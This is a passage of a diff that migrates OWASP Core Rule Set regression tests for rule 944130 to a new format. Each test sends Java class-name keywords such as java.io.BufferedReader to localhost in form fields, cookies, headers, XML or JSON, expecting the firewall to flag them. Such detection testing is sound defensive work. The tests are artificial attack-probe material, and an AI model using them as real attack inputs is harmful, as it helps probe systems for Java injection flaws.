+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "element_value"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 18
desc: "XML element value includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "com.sun.org.apache"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-19
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "com.sun.org.apache"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 19
desc: "Nested XML element value includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/xml"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "com.sun.org.apache"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-20
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/xml"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "com.sun.org.apache"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 20
desc: "Content-Type text/plain includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "text/plain"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "test=com.sun.org.apache"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-21
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "text/plain"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "test=com.sun.org.apache"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 21
desc: "Content-Type application/json arg value includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"test\": \"com.sun.org.apache\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-22
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: "HTTP/1.0"
+ data: "{\"test\": \"com.sun.org.apache\"}"
+ output:
+ log:
+ expect_ids: [944130]
+ - test_id: 22
desc: "Content-Type application/json arg name includes keyword com.sun.org.apache"
stages:
- - stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- headers:
- Host: "localhost"
- User-Agent: "OWASP CRS test agent"
- Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
- Accept-Encoding: "gzip,deflate"
- Accept-Language: "en-us,en;q=0.5"
- Content-Type: "application/json"
- method: "POST"
- uri: "/post"
- version: "HTTP/1.0"
- data: "{\"com.sun.org.apache\": \"test\"}"
- output:
- log_contains: "id \"944130\""
- - test_title: 944130-23
+ - input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
+ Accept-Encoding: "gzip,deflate"
+ Accept-Language: "en-us,en;q=0.5"
+ Content-Type: "application/json"
+ method: "POST"
+ uri: "/post"
+ version: 
"HTTP/1.0" + data: "{\"com.sun.org.apache\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 23 desc: "Argument test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 24 desc: "Argument name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream=test" + output: + log: + expect_ids: [944130] + - test_id: 25 desc: "Cookie test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 26 desc: "Cookie name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.BufferedInputStream=test - 
method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 27 desc: "Request header test includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 28 desc: "XML attribute value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test 
agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 29 desc: "XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 30 desc: "Nested XML element value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - 
dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedInputStream" + output: + log: + expect_ids: [944130] + - test_id: 31 desc: "Content-Type text/plain includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedInputStream" + output: + log: + expect_ids: 
[944130] + - test_id: 32 desc: "Content-Type application/json arg value includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-33 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedInputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 33 desc: "Content-Type application/json arg name includes keyword java.io.BufferedInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-34 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.BufferedInputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 34 desc: "Argument test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-35 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 35 desc: "Argument name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader=test" + output: + log: + expect_ids: [944130] + - test_id: 36 desc: "Cookie test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 37 desc: "Cookie name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: 
java.io.BufferedReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.BufferedReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 38 desc: "Request header test includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.BufferedReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.BufferedReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 39 desc: "XML attribute value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS 
test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 40 desc: "XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 41 desc: "Nested XML element value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 42 desc: "Content-Type text/plain includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.BufferedReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.BufferedReader" + output: + log: + expect_ids: [944130] + - test_id: 43 desc: 
"Content-Type application/json arg value includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.BufferedReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.BufferedReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 44 desc: "Content-Type application/json arg name includes keyword java.io.BufferedReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.BufferedReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
